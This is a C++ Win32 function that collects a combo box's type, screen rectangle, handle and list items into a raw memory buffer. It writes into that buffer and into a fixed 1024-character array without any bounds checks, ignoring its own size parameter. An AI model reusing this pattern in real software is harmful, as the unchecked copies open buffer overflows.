//Some ComboBoxEx and owner-drawn ComboBox can not get text
BOOL GrabComboBoxText(HWND hComboBox, LPVOID lpMem, DWORD &dwSize, DWORD &dwUsed)
{
	LPBYTE pByte = (LPBYTE)lpMem;
	pByte += dwUsed;
	LPTSTR pData = (LPTSTR)pByte;

	TCHAR szType[64];
	LONG_PTR lStyle = ::GetWindowLongPtr(hComboBox, GWL_STYLE);
    LONG_PTR lStyleEx = ::GetWindowLongPtr(hComboBox, GWL_EXSTYLE);

	if((CBS_DROPDOWN & lStyle) == CBS_DROPDOWN)
	{
		::lstrcpy(szType, _T("DropDownComboBox"));
	}
	else if((CBS_DROPDOWNLIST & lStyle) == CBS_DROPDOWNLIST)
	{
		::lstrcpy(szType, _T("DropDownListComboBox"));
	}
	else if((CBS_SIMPLE & lStyle) == CBS_SIMPLE)
	{
		::lstrcpy(szType, _T("SimpleComboBox"));
	}
	else
	{
		::lstrcpy(szType, _T("ComboBox<?>"));
	}

    TCHAR sz[128];
	RECT rect;
	::GetWindowRect(hComboBox, &rect);
    _stprintf(sz, _T("%s(%d,%d,%d,%d) 0x%X-\r\n"), szType, 
		rect.left, rect.top, rect.right, rect.bottom, hComboBox);

	DWORD dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
	::CopyMemory(pData, sz, dwDisp);
    dwUsed += dwDisp;
	pByte += dwDisp;
    pData = (LPTSTR)pByte;

	TCHAR pStr[1024];

	int count = ::SendMessage( 
            (HWND)hComboBox, // handle to destination window 
            CB_GETCOUNT,  // message to send
            0,          // not used; must be zero
            0);          // not used; must be zero
     //The return value will never be less than 1.

	if(count == CB_ERR || count == 0) return TRUE;
	
    for(int i = 0; i < count; i++)
	{
		DWORD ret = ::SendMessage( 
              (HWND) hComboBox,              // handle to destination window 
              CB_GETLBTEXTLEN,          // message to send
              (WPARAM)i,          // item index
              (LPARAM)0);         // not used; must be zero
		//ASSERT(ret != CB_ERR);
		ret = ::SendMessage( 
                (HWND) hComboBox,              // handle to destination window 
                CB_GETLBTEXT,             // message to send
                (WPARAM) i,          // item index
		        (LPARAM)(LPTSTR)pStr); 
		
		if(ret == CB_ERR) continue;

		pStr[ret] = TCHAR('\r');
		pStr[ret+1] = TCHAR('\n');

        dwDisp = (ret+2)*sizeof(TCHAR);
        ::CopyMemory(pData, pStr, dwDisp);
		dwUsed += dwDisp;
        pByte += dwDisp;
        pData = (LPTSTR)pByte;
	}
	return TRUE;
}

